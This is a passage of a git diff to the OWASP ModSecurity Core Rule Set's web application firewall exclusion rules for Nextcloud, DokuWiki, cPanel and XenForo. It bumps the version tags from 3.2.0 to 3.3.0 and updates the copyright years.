-1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -43,7 +43,7 @@ SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-NEXTCLOUD" SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ @@ -52,7 +52,7 @@ SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-NEXTCLOUD" @@ -74,7 +74,7 @@ SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ ctl:ruleRemoveById=953100-953130,\ ctl:ruleRemoveById=920420,\ ctl:ruleRemoveById=920440,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Skip PUT parsing for invalid encoding / protocol violations in binary files. 
@@ -84,7 +84,7 @@ SecRule REQUEST_METHOD "@streq PUT" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ "t:none,\ @@ -102,7 +102,7 @@ SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" # Allow the data type 'application/octet-stream' @@ -113,7 +113,7 @@ SecRule REQUEST_METHOD "@rx ^(?:PUT|MOVE)$" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@rx /remote\.php/dav/(?:files|uploads)/" \ "setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |application/octet-stream|'" @@ -126,7 +126,7 @@ SecRule REQUEST_METHOD "@streq PUT" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_FILENAME "@rx (?:/public\.php/webdav/|/remote\.php/dav/uploads/)" \ "ctl:ruleRemoveById=920340,\ @@ -147,7 +147,7 @@ SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ ctl:ruleRemoveById=951000-951999,\ ctl:ruleRemoveById=953100-953130,\ ctl:ruleRemoveById=920440,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Allow REPORT requests without Content-Type header (at least the iOS app does this) @@ -176,7 +176,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/core/search" \ ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:query,\ ctl:ruleRemoveTargetById=941000-942999;ARGS:query,\ ctl:ruleRemoveTargetById=932000-932999;ARGS:query,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # [ DAV ] 
@@ -198,7 +198,7 @@ SecRule REQUEST_FILENAME "@rx /(?:remote|index|public)\.php/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT PATCH CHECKOUT COPY DELETE LOCK MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH UNLOCK REPORT TRACE jsonp'" @@ -212,7 +212,7 @@ SecRule REQUEST_FILENAME "@rx /ocs/v[0-9]+\.php/apps/files_sharing/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT DELETE'" @@ -225,7 +225,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/core/preview.png" \ t:none,\ nolog,\ ctl:ruleRemoveTargetById=932150;ARGS:file,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Filepreview for trashbin @@ -237,7 +237,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/apps/files_trashbin/ajax/preview. nolog,\ ctl:ruleRemoveTargetById=932150;ARGS:file,\ ctl:ruleRemoveTargetById=942190;ARGS:file,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \ "id:9003160,\ @@ -246,7 +246,7 @@ SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \ t:none,\ nolog,\ ctl:ruleRemoveTargetById=941120;ARGS:requesttoken,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # [ Ownnote ] @@ -258,7 +258,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/apps/ownnote/" \ t:none,\ nolog,\ ctl:ruleRemoveById=941150,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # [ Text Editor ] @@ -276,7 +276,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/apps/files_texteditor/" \ ctl:ruleRemoveTargetById=932150;ARGS:filename,\ ctl:ruleRemoveTargetById=920370-920390;ARGS:filecontents,\ ctl:ruleRemoveTargetById=920370-920390;ARGS_COMBINED_SIZE,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # [ Address Book ] 
@@ -289,7 +289,7 @@ SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" # Allow modifying contacts via the web interface @@ -314,7 +314,7 @@ SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/calendar|'" @@ -330,7 +330,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/apps/notes/" \ t:none,\ nolog,\ ctl:ruleRemoveByTag=attack-injection-php,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # [ Bookmarks ] @@ -344,7 +344,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/apps/bookmarks/" \ t:none,\ nolog,\ ctl:ruleRemoveById=931130,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # @@ -363,7 +363,7 @@ SecRule REQUEST_FILENAME "@contains /index.php/login" \ nolog,\ ctl:ruleRemoveTargetById=941100;ARGS:requesttoken,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Reset password. @@ -373,7 +373,7 @@ SecRule REQUEST_FILENAME "@endsWith /index.php/login" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:action "@streq resetpass" \ "t:none,\ @@ -394,7 +394,7 @@ SecRule REQUEST_FILENAME "@endsWith /index.php/settings/users" \ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:newuserpassword,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecMarker "END-NEXTCLOUD-ADMIN" diff --git a/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf b/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf index 432ab2de3..71738c259 100644 --- a/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf 
@@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -26,7 +26,7 @@ SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DOKUWIKI" SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ @@ -35,7 +35,7 @@ SecRule &TX:crs_exclusions_dokuwiki|TX:crs_exclusions_dokuwiki "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DOKUWIKI" @@ -80,7 +80,7 @@ SecRule REQUEST_FILENAME "@rx (?:/doku.php|/lib/exe/ajax.php)$" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_METHOD "@streq POST" \ "t:none,\ @@ -105,7 +105,7 @@ SecRule REQUEST_FILENAME "@endsWith /lib/exe/ajax.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REQUEST_METHOD "@streq POST" \ "t:none,\ @@ -124,7 +124,7 @@ SecRule REQUEST_FILENAME "@endsWith /doku.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:do "@streq index" \ "t:none,\ @@ -148,7 +148,7 @@ SecRule REQUEST_FILENAME "@endsWith /doku.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:do "@streq login" \ "t:none,\ @@ -169,7 +169,7 @@ SecRule ARGS:do "!@streq admin" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DOKUWIKI-ADMIN" SecRule ARGS:do "!@streq admin" \ 
@@ -178,7 +178,7 @@ SecRule ARGS:do "!@streq admin" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-DOKUWIKI-ADMIN" @@ -193,7 +193,7 @@ SecRule REQUEST_FILENAME "@endsWith /doku.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:do "@streq login" \ "t:none,\ @@ -219,7 +219,7 @@ SecRule REQUEST_FILENAME "@endsWith /doku.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:page "@streq config" \ "t:none,\ @@ -251,7 +251,7 @@ SecRule REQUEST_FILENAME "@endsWith /doku.php" \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule ARGS:page "@streq config" \ "t:none,\ diff --git a/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf b/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf index 6b49250cd..a92d8093c 100644 --- a/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -18,7 +18,7 @@ SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-CPANEL" SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ @@ -27,7 +27,7 @@ SecRule &TX:crs_exclusions_cpanel|TX:crs_exclusions_cpanel "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-CPANEL" 
@@ -52,7 +52,7 @@ SecRule REQUEST_LINE "@rx ^GET /whm-server-status(?:/|/\?auto)? HTTP/[12]\.[01]$ tag:'language-multi',\ tag:'platform-apache',\ tag:'attack-generic',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "t:none,\ diff --git a/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf b/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf index 7ca9c1b93..7474d53ad 100644 --- a/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf +++ b/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -17,7 +17,7 @@ SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-XENFORO" SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ @@ -26,7 +26,7 @@ SecRule &TX:crs_exclusions_xenforo|TX:crs_exclusions_xenforo "@eq 0" \ pass,\ t:none,\ nolog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ skipAfter:END-XENFORO" @@ -48,7 +48,7 @@ SecRule REQUEST_FILENAME "@endsWith /proxy.php" \ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:link,\ ctl:ruleRemoveTargetById=931130;ARGS:referrer,\ ctl:ruleRemoveTargetById=942230;ARGS:referrer,\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Store drafts for private message, forum post, thread reply # POST /xf/conversations/draft 
@@ -72,7 +72,7 @@ SecRule REQUEST_FILENAME "@rx /(?:conversations|(?:conversations|forums|threads)
 ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\
 ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\
 ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Send PM, edit post, create thread, reply to thread
 # POST /xf/conversations/add
@@ -99,7 +99,7 @@ SecRule REQUEST_FILENAME "@rx /(?:conversations/add(?:-preview)?|conversations/m
 ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\
 ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\
 ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Quote
 # POST /xf/posts/12345/quote
@@ -110,7 +110,7 @@ SecRule REQUEST_FILENAME "@rx /posts/\d+/quote$" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:quoteHtml,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Multi quote
 # POST /xf/conversations/convo-title.12345/multi-quote
@@ -133,7 +133,7 @@ SecRule REQUEST_FILENAME "@rx /(?:conversations|threads)/.*\.\d+/multi-quote$" \
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[7][value],\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[8][value],\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:insert[9][value],\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Delete thread
 # POST /xf/threads/thread-title.12345/delete
@@ -144,7 +144,7 @@ SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/delete$" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetById=942130;ARGS:starter_alert_reason,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Feature thread
 # POST /xf/threads/thread-title.12345/feature-edit
@@ -166,7 +166,7 @@ SecRule REQUEST_FILENAME "@endsWith /inline-mod/" \
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:author_alert_reason,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Warn member
 # POST /xf/members/name.12345/warn
@@ -179,7 +179,7 @@ SecRule REQUEST_FILENAME "@rx /(?:members/.*\.\d+|posts/\d+)/warn$" \
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:conversation_message,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:notes,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Editor
 SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \
@@ -193,7 +193,7 @@ SecRule REQUEST_URI "@endsWith /index.php?editor/to-html" \
 ctl:ruleRemoveTargetById=942260;ARGS:attachment_hash_combined,\
 ctl:ruleRemoveTargetById=942340;ARGS:attachment_hash_combined,\
 ctl:ruleRemoveTargetById=942370;ARGS:attachment_hash_combined,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Editor
 SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \
@@ -203,7 +203,7 @@ SecRule REQUEST_URI "@endsWith /index.php?editor/to-bb-code" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Post attachment
 # POST /xf/account/avatar
@@ -219,7 +219,7 @@ SecRule REQUEST_FILENAME "@rx /(?:account/avatar|attachments/upload)$" \
 ctl:ruleRemoveTargetById=942440;ARGS:flowIdentifier,\
 ctl:ruleRemoveTargetById=942440;ARGS:flowFilename,\
 ctl:ruleRemoveTargetById=942440;ARGS:flowRelativePath,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Media
 # POST /xf/index.php?editor/media
@@ -231,7 +231,7 @@ SecRule REQUEST_URI "@endsWith /index.php?editor/media" \
 nolog,\
 ctl:ruleRemoveTargetById=931130;ARGS:url,\
 ctl:ruleRemoveTargetById=942130;ARGS:url,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Emoji
 # GET /xf/index.php?misc/find-emoji&q=(%0A%0A
@@ -242,7 +242,7 @@ SecRule REQUEST_URI "@rx /index\.php\?misc/find-emoji&q=" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetById=921151;ARGS:q,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Login
 # POST /xf/login/login
@@ -253,7 +253,7 @@ SecRule REQUEST_FILENAME "@endsWith /login/login" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Register account
 # POST /xf/register/register
@@ -268,7 +268,7 @@ SecRule REQUEST_FILENAME "@endsWith /register/register" \
 nolog,\
 ctl:ruleRemoveTargetById=942130;ARGS,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:reg_key,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Confirm account
 # GET /xf/account-confirmation/name.12345/email?c=foo
@@ -290,7 +290,7 @@ SecRule REQUEST_FILENAME "@endsWith /account/account-details" \
 nolog,\
 ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:about_html,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Lost password
 # POST /xf/lost-password/user-name.12345/confirm?c=foo
@@ -301,7 +301,7 @@ SecRule REQUEST_FILENAME "@rx /lost-password/.*\.\d+/confirm$" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:c,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Set forum signature
 # POST /xf/account/signature
@@ -312,7 +312,7 @@ SecRule REQUEST_FILENAME "@endsWith /account/signature" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:signature_html,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Search
 # POST /xf/search/search
@@ -327,7 +327,7 @@ SecRule REQUEST_FILENAME "@endsWith /search/search" \
 ctl:ruleRemoveTargetById=942260;ARGS:constraints,\
 ctl:ruleRemoveTargetById=942340;ARGS:constraints,\
 ctl:ruleRemoveTargetById=942370;ARGS:constraints,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Search within thread
 # GET /xf/threads/foo.12345/page12?highlight=foo
@@ -338,7 +338,7 @@ SecRule REQUEST_FILENAME "@rx /threads/.*\.\d+/(?:page\d+)?$" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:highlight,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Search within search result
 # GET /xf/search/12345/?q=foo
@@ -349,7 +349,7 @@ SecRule REQUEST_FILENAME "@rx /search/\d+/$" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:q,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Contact form
 # POST /xf/misc/contact
@@ -361,7 +361,7 @@ SecRule REQUEST_FILENAME "@endsWith /misc/contact" \
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:subject,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Report post
 # POST /xf/posts/12345/report
@@ -372,7 +372,7 @@ SecRule REQUEST_FILENAME "@rx /posts/\d+/report$" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Alternate thread view route
 # /xf/index.php?threads/title-having-some-sql.12345/
@@ -387,7 +387,7 @@ SecRule REQUEST_FILENAME "@endsWith /index.php" \
 pass,\
 t:none,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 chain"
 SecRule REQUEST_METHOD "@streq GET" \
 "t:none,\
@@ -411,7 +411,7 @@ SecRule REQUEST_URI "@endsWith /index.php?dbtech-security/fingerprint" \
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[14][value],\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[15][value],\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:components[16][value],\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Get location info
 SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \
@@ -421,7 +421,7 @@ SecRule REQUEST_FILENAME "@endsWith /misc/location-info" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:location,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 #
 # -=[ XenForo Global Exclusions ]=-
@@ -454,7 +454,7 @@ SecAction \
 ctl:ruleRemoveTargetByTag=OWASP_CRS;REQUEST_COOKIES:xf_ls,\
 ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_session,\
 ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:xf_user,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 #
 # -=[ XenForo Administration Back-End ]=-
@@ -468,7 +468,7 @@ SecRule REQUEST_FILENAME "!@endsWith /admin.php" \
 pass,\
 t:none,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 skipAfter:END-XENFORO-ADMIN"
 SecRule REQUEST_FILENAME "!@endsWith /admin.php" \
@@ -477,7 +477,7 @@ SecRule REQUEST_FILENAME "!@endsWith /admin.php" \
 pass,\
 t:none,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 skipAfter:END-XENFORO-ADMIN"
 # Admin edit user
@@ -490,7 +490,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/edit$" \
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:profile[about],\
 ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Admin save user
 # POST /xf/admin.php?users/the-user-name.12345/save
@@ -509,7 +509,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?users/.*\.\d+/save$" \
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:custom_fields[sexuality],\
 ctl:ruleRemoveTargetById=931130;ARGS:custom_fields[picture],\
 ctl:ruleRemoveTargetById=931130;ARGS:profile[website],\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Admin edit forum notice
@@ -523,7 +523,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?notices/(?:.*\.)?\d+/save$" \
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:message,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:title,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Admin batch thread update
 # POST /xf/admin.php?threads/batch-update/action
@@ -538,7 +538,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?(?:threads|users)/batch-update/action$" \
 ctl:ruleRemoveTargetById=942330;ARGS:criteria,\
 ctl:ruleRemoveTargetById=942340;ARGS:criteria,\
 ctl:ruleRemoveTargetById=942370;ARGS:criteria,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Edit forum theme
 # POST /xf/admin.php?styles/title.1234/style-properties/group&group=basic
@@ -555,7 +555,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?styles/" \
 ctl:ruleRemoveTargetById=942340;ARGS:json,\
 ctl:ruleRemoveTargetById=942370;ARGS:json,\
 ctl:ruleRemoveTargetById=942440;ARGS:json,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Set forum options
 # POST /xf/admin.php?options/update
@@ -566,7 +566,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?options/update" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:options[boardInactiveMessage],\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 # Edit pages/templates
 # POST /xf/admin.php?pages/0/save
@@ -579,7 +579,7 @@ SecRule REQUEST_URI "@rx /admin\.php\?(?:pages|templates)/.*/save" \
 t:none,\
 nolog,\
 ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:template,\
- ver:'OWASP_CRS/3.2.0'"
+ ver:'OWASP_CRS/3.3.0'"
 SecMarker "END-XENFORO-ADMIN"
diff --git a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
index c91f1855e..75191b10c 100644
--- a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
+++ b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
